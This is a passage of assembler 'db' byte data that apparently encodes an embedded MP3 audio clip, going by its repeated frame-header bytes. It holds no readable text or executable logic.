12,133,180,75,227,213,194,140,182,22,108,20,96,248,177,129 + db 185,19,135,152,168,142,40,151,16,150,59,45,30,42,103,169 + db 255,227,20,196,148,6,65,47,19,33,197,16,0,65,251,88 + db 193,255,219,223,207,49,29,253,212,223,60,204,114,83,19,205 + db 40,172,211,212,237,27,97,183,155,151,85,15,199,30,164,35 + db 255,227,20,196,158,7,64,130,255,32,56,70,12,205,147,167 + db 149,44,122,169,56,43,3,80,80,85,16,59,112,188,105,37 + db 88,253,204,245,61,215,79,79,244,239,191,245,149,95,254,108 + db 255,227,20,196,164,6,192,74,231,34,59,12,0,247,40,99 + db 104,236,76,231,30,212,100,33,26,92,191,237,143,127,152,65 + db 137,147,79,199,209,37,162,119,255,255,255,255,180,84,21,113 + db 255,227,20,196,172,7,192,58,231,55,73,0,0,96,89,10 + db 97,159,209,32,134,5,26,20,74,186,41,74,237,249,2,28 + db 168,161,207,255,255,151,255,245,41,127,254,99,226,148,40,137 + db 255,227,20,196,176,18,65,226,247,33,143,64,0,255,55,252 + db 194,162,248,108,218,119,69,111,235,254,66,180,151,127,79,255 + db 234,135,2,127,190,189,79,161,27,232,32,64,152,255,230,255 + db 255,227,20,196,138,11,193,199,7,33,135,80,0,95,234,141 + db 244,136,217,71,191,249,79,230,132,56,161,10,162,207,192,252 + db 68,6,127,255,229,66,102,8,30,48,118,162,47,123,155,161 + db 255,227,20,196,126,6,128,83,7,33,198,0,0,230,2,102 + db 191,200,120,107,185,0,87,120,127,78,129,134,127,127,255,158 + db 49,2,1,165,192,134,152,145,161,149,198,128,168,22,13,134 + db 255,227,20,196,135,6,0,119,15,32,17,132,36,63,201,237 + db 121,243,229,141,162,3,10,128,64,70,191,255,238,233,174,241 + db 64,116,152,155,13,37,113,102,14,121,193,95,198,194,137,104 + db 255,227,20,196,146,6,129,3,15,32,72,78,56,148,21,133 + db 1,84,137,64,71,186,142,254,239,255,113,103,131,71,150,10 + db 255,77,33,222,37,7,175,169,161,136,146,211,236,50,176,160 + db 255,227,20,196,155,6,65,39,19,32,16,10,160,65,239,246 + db 78,108,212,223,42,183,96,108,180,192,87,229,181,206,201,120 + db 139,168,179,131,202,85,121,80,127,2,132,82,122,20,79,221 + db 255,227,20,196,165,7,64,15,11,32,48,0,0,19,175,67 + db 139,161,243,143,93,255,226,112,33,114,225,249,67,152,33,66 + db 52,228,176,172,124,17,140,150,186,210,42,210,118,212,40,83 + db 255,227,20,196,171,8,0,131,15,32,8,6,160,85,13,67 + db 138,233,245,156,89,240,250,74,71,231,149,235,174,140,32,76 + db 174,85,218,248,241,144,186,62,184,64,64,77,18,146,251,85 + db 255,227,20,196,174,7,128,127,11,32,8,6,64,204,215,174 + db 203,3,69,229,192,232,148,82,209,186,166,149,250,171,107,90 + db 97,8,137,137,166,106,112,213,81,183,152,33,131,79,191,255 + db 255,227,20,196,179,7,0,34,243,32,16,132,0,250,11,255 + db 156,10,147,229,152,153,145,74,203,222,131,85,66,137,86,10 + db 164,44,138,3,253,214,236,192,142,142,34,134,8,88,107,255 + db 255,227,20,196,186,7,192,2,227,132,0,0,0,245,22,25 + db 236,121,149,72,227,63,161,123,240,199,252,189,13,201,133,194 + db 35,77,15,151,116,250,198,152,83,195,145,113,1,207,248,253 + db 255,227,20,196,190,8,64,114,235,32,19,6,12,20,168,79 + db 236,108,187,143,99,120,71,193,54,190,254,196,120,181,20,154 + db 28,90,71,255,14,121,255,220,149,80,197,4,110,223,221,243 + db 255,227,20,196,192,8,0,127,3,32,11,6,8,108,66,141 + db 171,2,244,114,147,214,113,84,73,80,167,30,72,169,97,232 + db 195,160,162,48,43,29,91,187,101,128,160,169,19,191,190,239 + db 255,227,20,196,195,6,192,211,3,32,72,70,105,95,61,88 + db 11,91,251,252,250,41,61,176,171,49,56,227,28,147,30,220 + db 254,205,104,227,168,110,129,51,150,105,135,15,148,67,110,167 + db 255,227,20,196,203,7,192,222,255,32,80,134,20,166,185,67 + db 90,214,191,32,30,193,201,136,95,102,72,150,227,18,64,53 + db 5,180,121,12,69,91,131,59,123,57,245,49,78,123,250,0 + db 255,227,20,196,207,8,192,230,243,32,88,70,52,6,3,3 + db 128,102,191,83,232,250,63,52,2,28,48,28,0,7,0,45 + db 1,244,3,144,133,7,9,162,137,156,209,151,131,182,43,255 + db 255,227,20,196,207,8,193,6,247,32,48,6,164,255,43,111 + db 167,163,94,4,97,208,4,33,1,239,147,78,117,165,17,123 + db 86,177,134,108,115,249,125,109,255,251,143,72,255,122,173,154 + db 255,227,20,196,207,9,1,18,247,32,48,134,80,187,251,127 + db 175,0,88,190,222,186,128,128,0,25,201,160,93,168,73,34 + db 109,158,170,109,152,190,53,26,246,185,56,239,188,2,3,66 + db 255,227,20,196,206,8,192,58,227,50,48,68,64,115,25,174 + db 99,153,21,212,177,182,87,83,207,170,140,4,16,132,36,49 + db 21,215,103,49,211,100,36,35,175,211,242,69,115,12,153,255 + db 255,227,20,196,206,9,64,58,215,52,50,70,32,50,203,50 + db 179,24,144,196,127,7,161,35,211,48,107,179,229,101,80,68 + db 244,162,106,136,38,74,165,175,106,201,142,243,252,128,195,182 + db 255,227,20,196,204,9,192,138,223,90,51,196,16,0,179,35 + db 138,250,221,90,146,116,111,39,255,109,109,108,187,62,218,131 + db 78,92,113,231,206,110,97,227,138,181,212,118,142,18,11,23 + db 255,227,20,196,200,7,64,74,227,36,67,210,4,102,37,251 + db 59,133,21,184,254,26,137,159,208,187,91,183,14,191,80,255 + db 192,226,191,169,255,168,120,207,156,195,190,134,255,255,152,72 + db 255,227,20,196,206,8,192,74,219,39,88,0,0,119,255,240 + db 209,175,223,172,159,77,64,242,107,230,148,63,242,37,191,191 + db 248,32,222,201,255,240,185,111,246,126,89,127,252,209,71,249 + db 255,227,20,196,206,18,129,206,231,63,143,80,0,64,64,118 + db 253,255,18,56,198,255,189,102,43,127,255,234,2,239,255,226 + db 111,208,127,195,6,7,63,226,114,111,185,253,144,105,181,121 + db 255,227,20,196,167,18,65,115,3,33,137,88,1,149,55,32 + db 127,131,254,239,224,63,46,202,236,28,12,40,96,96,124,39 + db 5,159,214,25,255,109,159,255,243,77,117,164,4,135,59,161 + db 255,227,20,196,129,7,65,91,15,33,194,40,0,163,63,248 + db 152,92,78,36,13,19,78,231,207,104,14,206,163,87,255,111 + db 255,254,178,92,12,10,93,237,150,160,3,249,112,172,176,121 + db 255,227,20,196,135,6,129,91,11,32,56,15,96,45,36,157 + db 18,239,53,77,20,158,175,255,255,110,181,6,157,255,253,108 + db 255,95,232,28,35,39,80,105,153,237,37,209,207,130,5,242 + db 255,227,20,196,144,6,1,83,11,32,40,5,96,227,226,224 + db 188,52,72,8,91,230,104,119,253,214,97,106,25,250,109,99 + db 234,119,223,114,55,48,230,68,23,161,167,9,170,255,251,123 + db 255,227,20,196,155,6,0,123,7,32,0,142,44,212,167,36 + db 213,94,212,129,30,223,111,61,103,224,98,108,44,0,117,255 + db 235,9,27,254,103,249,203,255,161,159,217,4,113,187,253,29 + db 255,227,20,196,166,7,0,83,15,32,24,76,100,91,254,105 + db 55,244,121,81,199,250,142,141,84,112,207,21,181,72,22,78 + db 237,16,56,159,19,125,30,183,255,65,144,145,232,29,140,59 + db 255,227,20,196,173,6,128,91,7,32,72,76,72,238,211,24 + db 118,185,129,23,169,158,8,21,199,24,208,54,193,136,1,26 + db 103,71,250,79,250,159,221,185,34,230,78,255,250,232,2,0 + db 255,227,20,196,182,7,64,210,235,33,77,40,0,33,65,205 + db 67,242,130,129,11,255,163,224,187,83,255,41,183,214,207,255 + db 232,119,244,87,208,211,166,63,249,74,195,180,160,124,144,100 + db 255,227,20,196,188,13,57,210,255,33,140,80,1,244,35,123 + db 203,158,92,47,134,44,9,150,183,78,202,73,181,51,187,37 + db 103,93,116,95,161,151,76,143,30,65,22,99,35,200,179,191 + db 255,227,20,196,170,11,1,226,255,33,200,56,0,221,84,249 + db 115,83,45,63,167,161,125,54,121,230,93,140,77,147,72,155 + db 195,200,180,237,204,107,45,164,152,108,217,250,237,154,14,219 + db 255,227,20,196,161,7,0,91,11,32,0,134,16,1,124,88 + db 46,121,6,59,28,238,183,242,110,173,114,209,248,223,73,143 + db 127,253,254,126,99,154,218,183,29,204,78,162,39,165,234,44 + db 255,227,20,196,168,6,128,74,235,32,17,132,32,145,93,210 + db 9,68,72,149,251,158,71,72,167,151,120,134,99,255,196,0 + db 0,232,12,6,49,147,234,130,34,95,255,255,255,254,182,9 + db 255,227,20,196,177,7,64,74,231,55,70,0,2,116,69,104 + db 141,125,95,229,193,40,135,14,34,64,106,88,169,239,255,236 + db 255,255,255,44,163,200,51,87,138,161,72,54,160,42,162,101 + db 255,227,20,196,183,15,129,226,247,33,137,104,0,232,29,227 + db 38,184,151,255,239,255,237,101,102,19,233,82,127,234,128,161 + db 140,131,105,10,192,139,160,143,240,20,1,182,231,206,127,250 + db 255,227,20,196,156,17,1,226,255,33,143,64,0,57,14,93 + db 255,183,235,57,204,255,2,181,28,32,43,232,160,96,211,226 + db 0,203,191,255,224,94,189,89,209,97,233,122,70,9,210,112 + db 255,227,20,196,123,6,0,75,15,33,197,0,0,96,177,25 + db 150,144,73,63,203,208,43,80,226,128,75,208,0,64,181,80 + db 147,255,255,255,87,66,139,8,132,70,211,66,172,82,69,202 + db 255,227,20,196,134,5,64,42,255,32,72,76,0,127,215,191 + db 160,207,8,107,32,0,0,24,209,97,109,63,255,236,28,38 + db 23,81,86,24,69,4,144,68,154,90,181,175,152,217,35,162 + db 255,227,20,196,148,6,0,74,235,32,105,144,0,1,201,146 + db 32,132,124,57,22,114,137,57,24,136,244,74,255,255,174,230 + db 53,97,39,158,225,223,3,2,21,9,54,136,52,1,206,55 + db 255,227,20,196,159,7,0,86,243,32,72,146,96,6,32,144 + db 26,35,179,206,176,234,211,13,244,244,251,255,255,211,239,40 + db 143,245,39,224,171,14,0,51,18,165,85,15,150,9,200,104 + db 255,227,20,196,166,8,64,74,255,32,1,82,12,211,132,22 + db 93,219,93,238,119,226,7,255,72,244,127,182,143,21,35,17 + db 92,4,105,8,100,224,185,9,243,197,80,52,56,21,59,169 + db 255,227,20,196,168,7,64,99,3,32,16,6,64,254,37,244 + db 159,238,254,91,255,255,235,208,120,73,121,125,152,56,56,46 + db 8,142,222,235,218,82,15,130,246,72,74,252,179,210,72,6 + db 255,227,20,196,174,7,128,115,7,32,16,6,128,144,71,255 + db 159,187,31,32,255,244,22,19,180,180,145,45,139,75,207,223 + db 177,136,141,165,128,237,56,139,255,124,56,0,131,243,146,91 + db 255,227,20,196,179,7,64,98,247,32,8,76,0,176,69,248 + db 224,128,12,242,23,178,99,56,122,40,31,92,146,52,85,196 + db 212,18,66,81,79,248,198,17,115,46,59,242,193,255,255,255 + db 255,227,20,196,185,7,128,74,235,36,11,216,4,254,175,44 + db 3,8,3,176,237,231,149,128,42,195,32,251,158,201,118,12 + db 129,47,243,132,144,24,6,179,79,254,164,255,250,254,91,255 + db 255,227,20,196,190,7,192,78,235,32,121,132,68,75,125,63 + db 144,148,195,15,134,90,196,165,25,190,22,26,191,252,108,113 + db 207,253,66,130,177,226,36,208,207,158,255,235,255,255,244,49 + db 255,227,20,196,194,7,64,58,227,44,130,76,0,255,209,137 + db 125,127,204,247,147,88,191,134,122,56,29,52,238,247,31,121 + db 225,223,95,194,79,10,157,98,159,226,95,167,223,226,35,61 + db 255,227,20,196,200,8,64,126,235,32,96,80,129,98,97,159 + db 15,130,195,162,224,61,0,26,2,196,59,128,203,173,18,151 + db 62,102,186,195,30,160,31,16,4,19,217,223,255,172,228,193 + db 255,227,20,196,202,7,104,154,247,32,74,204,81,64,24,231 + db 125,31,156,96,4,25,136,168,173,166,164,85,255,147,121,0 + db 170,250,0,8,63,255,255,233,122,236,255,200,45,215,145,185 + db 255,227,20,196,207,9,0,146,231,32,67,94,84,127,160,76 + db 118,234,156,141,57,62,239,255,114,153,153,197,5,16,44,37 + db 29,122,63,255,205,254,189,150,104,97,161,106,79,194,58,83 + db 255,227,20,196,206,8,128,190,235,36,51,84,64,47,113,148 + db 255,148,4,207,171,162,247,42,73,211,69,56,239,84,59,213 + db 141,99,191,255,127,215,251,170,149,72,56,11,143,30,118,44 + db 255,227,20,196,207,9,65,162,243,32,11,206,68,253,62,87 + db 184,233,70,81,171,29,216,82,231,17,38,231,178,125,145,127 + db 183,251,154,131,225,1,166,34,127,253,24,193,16,97,200,255 + db 255,227,20,196,205,8,64,94,235,32,11,204,36,255,193,31 + db 242,205,172,119,250,35,52,6,45,97,191,78,180,65,71,230 + db 2,159,255,255,255,109,4,0,216,39,56,17,98,95,178,200 + db 255,227,20,196,207,9,64,90,231,40,123,4,68,241,28,39 + db 175,57,122,7,247,56,24,85,55,41,126,94,130,64,158,99 + db 127,255,255,245,85,9,206,126,113,198,183,255,95,251,231,147 + db 255,227,20,196,205,7,193,78,255,32,96,68,84,100,14,2 + db 85,168,56,109,32,56,13,79,56,169,44,220,239,155,155,53 + db 115,244,253,84,193,88,69,154,223,255,238,20,40,65,95,233 + db 255,227,20,196,209,9,129,71,11,32,42,4,228,205,217,112 + db 111,197,24,30,85,87,60,6,71,49,176,156,58,20,17,59 + db 219,111,31,235,255,223,255,95,246,152,37,253,255,93,100,255 + db 255,227,20,196,206,8,129,99,3,32,56,5,96,255,45,180 + db 249,93,228,129,161,138,16,234,220,249,89,143,23,59,182,115 + db 244,127,65,6,34,20,68,63,163,250,209,43,253,189,173,207 + db 255,227,20,196,207,8,193,94,255,32,56,11,96,95,168,241 + db 1,13,216,80,88,10,70,127,217,122,37,118,51,149,101,67 + db 138,255,80,8,56,217,193,237,189,185,199,222,95,253,125,17 + db 255,227,20,196,207,8,193,87,3,32,64,21,4,142,109,107 + db 86,24,57,112,160,194,161,12,58,196,116,170,18,236,140,103 + db 26,167,133,131,34,194,133,131,174,156,208,164,173,182,159,120 + db 255,227,20,196,207,8,57,218,255,32,40,21,5,182,225,79 + db 156,24,223,233,237,255,255,173,176,162,14,127,241,134,154,37 + db 89,65,133,206,61,46,87,255,253,31,152,150,95,158,112,64 + db 255,227,20,196,209,9,129,90,231,50,80,5,96,185,129,41 + db 231,181,114,63,80,119,34,89,1,64,121,45,250,253,255,87 + db 216,77,208,131,211,8,199,94,161,149,248,80,22,64,136,247 + db 255,227,20,196,206,8,64,206,235,33,79,40,0,255,255,14 + db 204,75,54,84,89,182,246,57,17,159,232,22,112,61,4,13 + db 232,226,92,148,176,23,187,253,255,255,80,113,3,212,29,170 + db 255,227,20,196,208,13,129,227,3,33,143,40,0,179,186,36 + db 127,14,3,77,81,211,118,110,137,172,82,240,163,92,28,159 + db 185,221,95,57,233,20,99,233,218,202,132,244,153,143,119,171 + db 255,227,20,196,189,13,1,35,15,33,137,40,0,226,111,51 + db 4,56,72,45,29,1,218,137,217,238,20,160,142,53,95,44 + db 189,117,177,103,250,71,30,25,121,4,131,13,148,2,191,253 + db 255,227,20,196,172,6,128,179,19,33,197,16,0,54,41,119 + db 137,17,32,3,198,192,113,224,128,105,226,16,97,137,129,234 + db 38,100,65,132,219,3,172,200,169,175,255,91,63,255,30,240 + db 255,227,20,196,181,6,64,139,23,32,8,4,168,251,253,189 + db 16,183,163,4,199,3,171,207,192,251,2,88,27,33,130,4 + db 128,116,103,184,5,2,127,255,157,245,119,227,142,128,209,177 + db 255,227,20,196,191,7,64,127,11,32,16,68,40,252,165,118 + db 232,232,3,3,97,172,32,96,224,5,80,254,24,69,145,19 + db 186,9,103,246,191,243,159,155,36,69,76,180,158,223,251,208 + db 255,227,20,196,197,6,128,74,239,32,24,12,64,148,145,105 + db 19,63,50,243,9,48,221,1,37,11,40,101,42,1,227,233 + db 177,209,77,156,172,175,231,126,169,212,251,3,151,255,168,243 + db 255,227,20,196,206,8,64,74,231,54,72,68,64,115,199,88 + db 71,0,147,74,81,213,161,162,163,135,101,187,173,111,26,112 + db 143,242,191,49,237,95,239,122,134,6,91,180,119,254,163,255 + db 255,227,20,196,208,9,128,74,227,134,24,74,96,231,82,188 + db 148,248,27,0,145,27,18,136,64,4,0,0,93,14,182,51 + db 29,51,133,91,200,204,118,93,207,22,209,152,150,87,59,17 + db 255,227,20,196,205,9,0,74,227,76,51,210,36,2,36,16 + db 236,167,161,145,184,12,10,14,4,3,12,66,36,22,220,22 + db 5,146,83,20,102,11,226,122,153,228,255,16,227,111,247,255 + db 255,227,20,196,204,8,128,58,231,34,51,216,4,146,24,199 + db 159,255,255,253,52,97,255,45,158,138,221,3,195,51,123,235 + db 114,244,143,116,173,61,82,40,148,28,16,150,44,40,22,46 + db 255,227,20,196,205,8,192,74,231,50,123,198,0,65,26,2 + db 89,40,177,19,18,9,135,173,50,8,202,26,146,139,157,124 + db 185,166,163,164,142,172,176,226,99,185,66,124,215,215,247,95 + db 255,227,20,196,205,8,128,74,231,36,120,146,0,251,29,223 + db 93,252,207,119,241,252,196,50,239,234,251,42,151,94,127,255 + db 253,28,173,42,137,9,255,201,18,193,160,104,74,72,10,196 + db 255,227,20,196,206,9,64,74,231,55,79,0,2,51,255,253 + db 145,223,68,66,68,7,70,26,20,108,128,179,71,99,5,191 + db 241,241,17,84,122,36,151,171,255,253,121,226,95,3,58,233 + db 255,227,20,196,204,18,129,226,231,103,143,80,0,24,39,17 + db 27,129,168,46,2,102,80,33,41,119,7,232,128,13,62,155 + db 241,192,153,79,167,68,10,78,23,65,208,69,162,85,54,203 + db 255,227,20,196,165,18,193,226,251,33,134,88,0,65,82,153 + db 61,112,145,168,146,208,239,255,246,127,255,250,244,127,240,7 + db 32,58,30,192,248,191,124,250,3,13,178,168,116,49,255,255 + db 255,227,20,196,125,6,64,155,11,33,193,16,0,83,176,125 + db 233,171,254,160,65,210,224,126,63,71,225,227,48,218,214,31 + db 244,1,76,159,21,187,252,22,55,221,191,49,190,33,11,14 + db 255,227,20,196,135,6,192,18,231,94,16,64,0,119,86,10 + db 8,165,68,77,51,187,235,114,40,30,11,247,156,87,231,7 + db 37,225,158,251,40,113,191,40,255,80,150,219,113,171,252,226 + db 255,227,20,196,143,6,192,78,235,48,75,198,40,217,80,107 + db 158,255,255,254,142,95,216,76,176,198,238,200,2,173,212,56 + db 19,254,88,43,50,244,200,103,236,112,79,197,221,255,255,255 + db 255,227,20,196,151,7,0,74,243,32,43,210,4,250,191,253 + db 188,165,7,11,158,224,41,194,129,134,181,33,102,31,95,114 + db 42,159,61,21,45,183,217,0,164,118,168,103,17,142,172,160 + db 255,227,20,196,158,7,192,74,247,32,123,12,4,111,161,65 + db 102,191,130,173,45,36,21,58,175,118,167,247,251,151,232,82 + db 253,107,223,79,178,134,81,17,36,10,41,133,49,70,24,157 + db 255,227,20,196,162,9,192,254,255,32,73,198,92,44,79,201 + db 81,136,14,255,125,233,123,23,91,183,79,255,236,167,213,190 + db 52,205,74,106,61,8,208,248,143,3,78,51,107,124,157,216 + db 255,227,20,196,158,6,192,195,3,32,48,148,24,132,8,219 + db 207,92,145,212,255,217,102,15,201,220,136,127,250,166,146,224 + db 241,182,244,92,176,96,51,244,113,137,115,199,255,241,160,220 + db 255,227,20,196,166,7,0,191,7,32,18,4,224,1,192,160 + db 37,239,93,207,247,5,161,199,95,111,69,15,9,204,177,139 + db 175,94,114,59,25,40,162,235,232,133,231,101,245,206,251,119 + db 255,227,20,196,173,7,64,194,243,32,73,80,76,119,255,245 + db 255,240,200,116,234,200,187,105,153,205,6,52,2,68,211,128 + db 199,19,68,221,175,84,139,146,46,120,146,127,245,255,152,138 + db 255,227,20,196,179,7,128,58,231,52,41,144,0,75,198,65 + db 215,247,68,111,82,94,230,190,190,242,133,139,14,64,84,131 + db 181,86,184,103,28,114,156,143,103,16,157,50,47,31,251,125 + db 255,227,20,196,184,6,192,18,219,47,67,0,2,48,0,131 + db 103,254,253,122,49,220,32,0,10,79,63,255,255,201,121,204 + db 28,14,18,56,220,13,67,127,88,48,102,244,255,252,209,64 + db 255,227,20,196,192,12,65,14,255,33,143,80,0,13,111,255 + db 255,253,38,205,2,98,223,255,235,191,255,200,255,169,223,254 + db 161,155,44,216,51,191,95,214,244,63,255,235,15,166,255,255 + db 255,227,20,196,178,10,128,195,3,33,200,72,0,213,183,255 + db 172,221,255,152,57,82,102,157,81,36,171,211,125,127,255,232 + db 165,97,102,127,204,103,87,161,141,255,151,86,32,163,127,255 + db 255,227,20,196,171,7,64,175,7,32,64,76,52,19,7,127 + db 128,40,0,5,70,178,15,177,151,68,197,34,124,102,157,151 + db 154,237,24,64,109,197,10,254,178,132,153,255,255,255,255,18 + db 255,227,20,196,177,7,64,182,247,32,105,144,12,61,255,252 + db 114,63,204,40,110,144,227,65,82,16,1,208,44,4,56,150 + db 158,145,222,188,219,157,52,40,61,21,63,150,126,3,160,98 + db 255,227,20,196,183,7,169,90,251,32,48,10,197,223,255,180 + db 61,16,68,25,162,177,16,3,160,71,192,194,58,81,8,5 + db 56,58,47,185,219,239,255,237,250,116,5,127,255,165,98,83 + db 255,227,20,196,187,7,1,218,251,32,40,14,196,255,255,209 + db 3,0,65,81,84,88,42,192,113,64,185,35,100,134,205,137 + db 59,11,23,59,127,253,243,51,127,217,192,180,179,255,218,42 + db 255,227,20,196,194,6,65,222,251,32,80,26,176,123,255,251 + db 87,2,67,41,209,129,57,90,97,119,34,121,109,233,81,112 + db 159,246,105,169,32,16,167,212,213,43,82,230,133,94,255,237 + db 255,227,20,196,204,8,1,90,239,32,8,196,104,106,59,20 + db 3,32,32,58,44,185,16,150,152,10,192,68,109,12,187,111 + db 1,132,143,251,26,32,251,154,177,143,95,68,44,50,45,98 + db 255,227,20,196,207,9,65,82,231,94,48,74,174,80,40,255 + db 255,232,71,222,11,131,39,80,39,144,227,185,238,176,22,100 + db 88,22,231,119,237,59,175,213,178,255,243,142,203,255,255,255 + db 255,227,20,196,205,8,128,206,231,32,120,70,176,249,134,111 + db 255,229,191,1,0,5,68,15,0,0,0,252,88,35,88,62 + db 6,201,13,146,22,226,84,109,184,210,132,196,231,253,200,68 + db 255,227,20,196,206,8,128,210,231,44,121,132,68,217,23,81 + db 242,49,183,4,86,127,34,170,208,89,30,250,220,137,40,205 + db 159,232,53,163,183,179,16,244,148,171,144,200,112,207,117,238 + db 255,227,20,196,207,9,0,210,231,54,120,202,68,61,49,171 + db 206,172,67,90,79,38,2,123,168,135,32,129,4,189,48,250 + db 32,218,65,123,206,8,51,68,237,118,134,232,15,197,100,132 + db 255,227,20,196,206,8,192,74,227,54,120,146,8,17,17,11 + db 17,189,147,221,203,162,234,106,51,211,109,171,175,185,153,109 + db 239,127,204,159,24,197,83,120,254,170,167,43,174,107,235,154 + db 255,227,20,196,206,9,64,74,227,46,121,146,40,254,177,134 + db 63,97,169,32,254,162,68,251,107,252,210,152,162,103,217,118 + db 253,162,238,61,175,79,27,125,69,106,127,189,57,130,2,140 + db 255,227,20,196,204,8,193,90,219,33,75,16,0,84,143,249 + db 146,184,33,32,33,135,85,250,225,29,139,17,202,134,219,211 + db 255,255,239,172,137,119,212,254,71,155,67,25,129,16,50,101 + db 255,227,20,196,204,13,1,18,231,101,137,16,0,170,86,10 + db 177,159,255,255,255,250,220,88,26,36,129,71,134,12,193,14 + db 143,36,87,211,87,117,99,143,242,255,1,205,157,31,212,126 + db 255,227,20,196,187,18,105,194,255,33,131,88,1,159,214,255 + db 221,255,254,175,35,114,29,15,120,82,34,86,220,164,92,182 + db 38,55,61,195,1,184,185,207,78,97,152,47,123,125,40,237 + db 255,227,20,196,148,11,65,115,19,33,129,64,0,191,219,253 + db 52,251,159,33,165,153,145,166,26,200,223,230,158,151,213,133 + db 133,37,215,60,161,134,170,89,247,244,55,248,96,225,177,222 + db 255,227,20,196,138,6,128,79,19,33,195,0,0,131,159,212 + db 223,243,255,223,252,112,207,227,151,125,174,60,97,166,253,15 + db 255,255,52,155,255,200,251,99,224,70,249,2,215,160,239,45 + db 255,227,20,196,147,4,192,38,255,32,11,18,0,238,235,57 + db 194,167,243,97,190,85,221,252,183,128,191,151,68,254,52,3 + db 28,203,221,196,144,132,250,169,255,191,250,255,152,159,169,1 + db 255,227,20,196,163,7,128,74,235,39,79,0,0,197,223,138 + db 123,127,205,59,45,223,241,191,202,125,1,33,43,245,32,103 + db 246,38,255,223,253,95,249,163,231,254,120,144,65,181,179,252 + db 255,227,20,196,168,12,177,195,11,33,137,56,1,151,142,32 + db 0,11,227,255,202,15,233,34,15,111,232,255,213,159,255,254 + db 16,83,245,150,22,229,157,254,191,199,7,30,16,152,19,193 + db 255,227,20,196,152,9,1,227,11,33,194,56,0,174,148,255 + db 67,126,87,10,37,146,119,255,226,206,135,72,255,65,184,155 + db 3,33,1,144,40,226,192,94,217,186,74,107,82,203,127,169 + db 255,227,20,196,151,6,64,115,15,32,16,10,100,174,51,45 + db 251,254,223,175,249,95,33,10,72,146,22,34,176,144,168,107 + db 43,153,217,171,71,157,172,114,194,255,243,83,205,255,189,176 + db 255,227,20,196,161,7,65,51,3,32,8,10,0,77,72,176 + db 222,61,156,53,67,74,39,143,2,163,34,15,247,84,90,12 + db 100,65,120,136,116,69,6,226,237,159,243,115,59,241,177,116 + db 255,227,20,196,167,7,1,95,7,32,16,14,192,21,30,205 + db 148,255,255,255,101,92,50,142,218,244,125,35,135,211,43,112 + db 215,84,168,235,223,74,110,247,247,123,46,226,185,226,54,58 + db 255,227,20,196,174,6,193,59,15,32,0,74,40,182,199,190 + db 73,139,139,86,130,89,209,66,140,73,207,3,235,81,49,66 + db 121,137,26,72,69,7,230,15,140,35,58,146,43,155,95,181 + db 255,227,20,196,182,5,192,163,15,32,1,132,4,109,200,90 + db 188,252,92,91,110,161,209,203,97,202,159,68,5,133,191,26 + db 105,227,232,223,244,255,209,190,143,229,70,171,5,35,183,149 + db 255,227,20,196,194,7,0,74,223,35,88,0,0,190,230,81 + db 127,255,255,232,112,207,207,163,243,148,237,245,3,252,51,124 + db 173,244,118,249,62,99,14,239,255,255,187,21,223,24,154,94 + db 255,227,20,196,201,19,129,226,231,33,152,88,0,189,67,235 + db 232,5,22,250,21,186,20,89,244,86,89,191,190,74,120,102 + db 92,66,212,127,234,184,84,8,24,205,164,68,67,98,185,49 + db 255,227,20,196,158,18,65,154,255,33,140,88,1,24,201,61 + db 132,109,173,216,6,252,200,148,219,7,38,76,239,41,63,18 + db 22,39,204,3,7,71,167,41,90,244,196,70,5,139,156,176 + db 255,227,20,196,120,6,1,11,19,33,194,16,0,65,255,255 + db 250,255,191,230,140,140,54,36,13,16,168,40,201,95,28,254 + db 179,129,191,202,186,239,73,70,253,68,143,71,250,31,241,70 + db 255,227,20,196,131,5,129,15,19,32,8,4,160,245,255,252 + db 64,40,160,171,146,232,127,236,254,232,52,51,252,191,237,252 + db 73,255,159,248,194,127,253,30,11,255,211,3,70,215,157,163 + db 255,227,20,196,144,4,248,183,11,32,8,10,65,69,32,187 + db 80,119,106,235,15,255,255,160,221,202,126,182,234,119,183,82 + db 113,63,168,102,161,238,154,132,203,249,223,242,13,78,38,255 + db 255,227,20,196,159,6,240,178,247,32,40,18,65,255,81,234 + db 65,51,152,179,117,29,203,245,1,127,202,59,117,183,171,133 + db 186,250,183,244,55,255,209,196,67,86,255,243,123,88,91,15 + db 255,227,20,196,166,7,192,211,11,32,9,138,64,193,94,87 + db 250,140,127,206,242,21,250,8,128,249,15,111,255,183,255,232 + db 66,4,6,255,255,241,85,63,234,65,4,16,66,130,191,251 + db 255,227,20,196,170,8,0,251,7,32,72,78,80,84,210,140 + db 15,171,116,40,255,31,2,227,67,252,243,191,255,103,254,202 + db 112,61,49,191,255,213,193,69,155,237,83,9,7,4,129,182 + db 255,227,20,196,173,6,193,59,11,32,48,10,68,213,233,205 + db 234,73,60,192,52,198,75,172,143,236,252,140,168,255,255,255 + db 254,64,71,163,107,69,51,14,39,5,214,197,196,82,140,250 + db 255,227,20,196,181,6,192,74,255,32,88,76,68,233,202,105 + db 217,251,5,240,110,144,0,200,226,0,137,67,246,97,208,82 + db 183,255,255,249,36,2,119,255,237,28,73,154,30,197,9,92 + db 255,227,20,196,189,6,192,143,11,32,16,10,64,163,199,151 + db 197,182,164,32,128,216,24,35,8,133,39,78,149,74,113,228 + db 136,226,255,253,75,255,253,196,191,255,51,209,251,237,162,223 + db 255,227,20,196,197,7,1,87,11,32,40,5,96,79,166,143 + db 96,200,197,198,239,124,193,132,35,28,250,16,0,67,116,106 + db 190,79,95,160,3,14,64,67,135,238,151,151,234,143,253,87 + db 255,227,20,196,204,8,65,218,251,32,80,27,97,104,148,226 + db 206,56,188,52,200,69,253,16,36,142,63,255,219,97,51,231 + db 255,153,8,30,60,16,152,75,52,224,161,197,5,14,245,177 + db 255,227,20,196,206,8,65,131,3,32,56,11,96,223,255,204 + db 21,230,140,252,141,31,46,65,54,127,143,22,82,32,128,199 + db 39,135,212,173,216,204,49,19,200,7,2,172,255,255,255,242 + db 255,227,20,196,208,8,129,138,251,32,56,5,5,223,242,130 + db 234,131,144,66,144,67,85,92,201,237,171,172,97,71,196,64 + db 201,18,18,102,107,121,27,146,46,245,230,208,24,58,196,221 + db 255,227,20,196,209,9,64,206,235,32,96,70,176,87,253,95 + db 254,143,9,64,128,52,68,100,7,149,128,43,70,45,178,205 + db 67,112,224,163,130,143,145,170,151,221,66,140,24,118,173,255 + db 255,227,20,196,207,8,64,210,239,32,121,132,100,255,91,191 + db 250,53,127,48,1,52,7,46,15,67,35,144,11,148,190,39 + db 59,29,4,41,103,96,177,48,214,165,0,79,127,255,42,24 + db 255,227,20,196,209,9,0,210,255,32,97,132,40,217,254,43 + db 193,82,127,3,4,224,72,40,27,182,106,185,81,52,9,250 + db 255,234,127,255,125,87,250,123,18,73,207,99,156,231,246,184 + db 